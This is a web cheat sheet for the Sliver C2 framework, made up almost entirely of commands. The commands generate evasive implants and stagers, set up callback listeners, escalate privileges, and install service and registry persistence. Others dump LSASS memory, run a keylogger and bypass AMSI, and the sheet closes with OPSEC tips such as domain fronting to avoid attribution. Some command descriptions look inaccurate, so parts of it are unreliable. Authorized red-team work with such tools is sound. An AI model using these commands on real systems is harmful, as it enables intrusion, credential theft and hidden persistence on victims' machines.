Skip to content

Sliver C2 Framework Cheat Sheet

Overview

Sliver is a modern, open-source cross-platform adversary emulation/red team framework designed as an alternative to Cobalt Strike. It provides advanced command and control capabilities with support for multiple platforms, evasive communications, and team-based operations.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

# Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server
chmod +x sliver-server

# Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server
chmod +x sliver-server

# Download latest release for Windows
# Download sliver-server_windows.exe from GitHub releases

Build from Source

# Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git
cd sliver
make

Docker Installation

# Pull official Docker image
docker pull bishopfox/sliver

# Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver

Basic Usage

Starting Sliver Server

# Start the server (first run will generate certificates)
./sliver-server

# Start server with custom configuration
./sliver-server -c /path/to/config.json

# Start server in daemon mode
./sliver-server daemon

Client Connection

# Connect to local server
./sliver-client

# Connect to remote server
./sliver-client -c /path/to/client.cfg

# Generate new client configuration
./sliver-server operator --name username --lhost server-ip

Command Reference

Server Management

Command Description
help Display help information
version Show version information
operators List connected operators
kick-operator <name> Disconnect an operator
armory Access the Sliver armory (extensions)

Listener Management

Command Description
mtls Start mTLS listener
wg Start WireGuard listener
http Start HTTP listener
https Start HTTPS listener
dns Start DNS listener
jobs List active listeners
jobs -k <id> Kill a listener

Implant Generation

Command Description
generate Generate implant
generate --mtls <host:port> Generate mTLS implant
generate --http <url> Generate HTTP implant
generate --dns <domain> Generate DNS implant
profiles List implant profiles
profiles new <name> Create new profile

Session Management

Command Description
sessions List active sessions
use <session-id> Interact with session
background Background current session
sessions -k <id> Kill a session
sessions -K Kill all sessions

Listener Setup

# Start mTLS listener on default port (8888)
mtls

# Start mTLS listener on custom port
mtls -l 443

# Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888

HTTP/HTTPS Listeners

# Start HTTP listener
http -l 80

# Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem

# Start HTTP listener with custom domain
http -l 80 -d example.com

DNS Listener

# Start DNS listener
dns -d example.com

# Start DNS listener with custom nameserver
dns -d example.com -l 53

WireGuard Listener

# Start WireGuard listener
wg -l 53

# Start WireGuard listener with custom key port
wg -l 53 -x 1234

Implant Generation

Basic Implant Generation

# Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

# Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf

# Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho

Advanced Implant Options

# Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant

# Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols

# Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode

# Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format shared

Staged Payloads

# Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged

# Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

Session Interaction

Basic Session Commands

# Get system information
info

# Get current user
whoami

# Get current working directory
pwd

# List files and directories
ls

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

Process Management

# List processes
ps

# Get current process info
getpid

# Migrate to another process
migrate <pid>

# Execute command
execute <command>

# Start interactive shell
shell

# Terminate process
terminate <pid>

Network Operations

# Get network interfaces
ifconfig

# Get network connections
netstat

# Port forward
portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80

# List port forwards
portfwd

# Remove port forward
portfwd rm --id <id>

# SOCKS proxy
socks5 start

# Stop SOCKS proxy
socks5 stop

Privilege Escalation

# Get current privileges
getprivs

# Attempt privilege escalation
getsystem

# Run as different user
runas -u username -p password <command>

# Impersonate token
impersonate <token-id>

# Revert to self
rev2self

Persistence

# Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe

# Install registry persistence
persistence registry --hive HKCU --path "Software\\Microsoft\\Windows\\CurrentVersion\\Run" --key "MyApp"

# Remove persistence
persistence remove --id <persistence-id>

Advanced Features

Pivoting and Lateral Movement

# Generate pivot listener
pivots tcp --bind 0.0.0.0:9999

# Connect through pivot
generate --mtls pivot-host:9999 --os windows

# List active pivots
pivots

# Stop pivot
pivots --id <id> stop

Credential Harvesting

# Dump process memory
procdump -p <pid> -s /tmp/dump.dmp

# Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp

# Screenshot
screenshot

# Keylogger
keylogger start
keylogger dump
keylogger stop

Evasion Techniques

# Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe

# In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe

# PowerShell execution
powershell -c "Get-Process"

# Bypass AMSI
armory install bypass-amsi

Profiles and Templates

Creating Profiles

# Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64

# Generate from profile
generate --profile windows-profile

# List profiles
profiles

# Delete profile
profiles rm windows-profile

C2 Profile Customization

# HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website

# HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443

Armory Extensions

Installing Extensions

# Update armory
armory update

# Install extension
armory install <extension-name>

# List available extensions
armory

# List installed extensions
armory installed

# Process injection techniques
armory install process-injection

# Credential dumping
armory install credman

# Registry operations
armory install registry

# WMI operations
armory install wmi

Team Operations

Multi-Operator Setup

# Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg

# Connect as operator
./sliver-client -c operator1.cfg

# List connected operators
operators

# Send message to operators
msg "Hello team!"

Session Sharing

# Share session with team
sessions -i <session-id> --shared

# Take control of shared session
use <session-id>

Troubleshooting

Common Issues

Connection Problems

# Check listener status
jobs

# Restart listener
jobs -k <listener-id>
mtls -l 8888

# Check firewall rules
# Ensure ports are open on server

Implant Detection

# Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug

# Try different communication protocols
generate --dns example.com --os windows

# Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windows

Performance Issues

# Adjust beacon interval
use <session-id>
reconfig --beacon-interval 60s

# Use compression
reconfig --compress

Debugging

# Enable debug mode
./sliver-server --debug

# Check logs
tail -f ~/.sliver/logs/sliver.log

# Verbose client output
./sliver-client --debug

Security Considerations

Operational Security

  • Use encrypted communications (mTLS recommended)
  • Regularly rotate certificates and keys
  • Implement proper access controls for operators
  • Monitor and log all activities
  • Use staging servers to avoid direct attribution

Evasion Best Practices

  • Vary beacon intervals and jitter
  • Use legitimate-looking domains and certificates
  • Implement domain fronting where possible
  • Use multiple communication channels
  • Regularly update implants and techniques

Resources

This cheat sheet provides a comprehensive reference for using Sliver C2 Framework. Always ensure you have proper authorization before using this tool in any environment.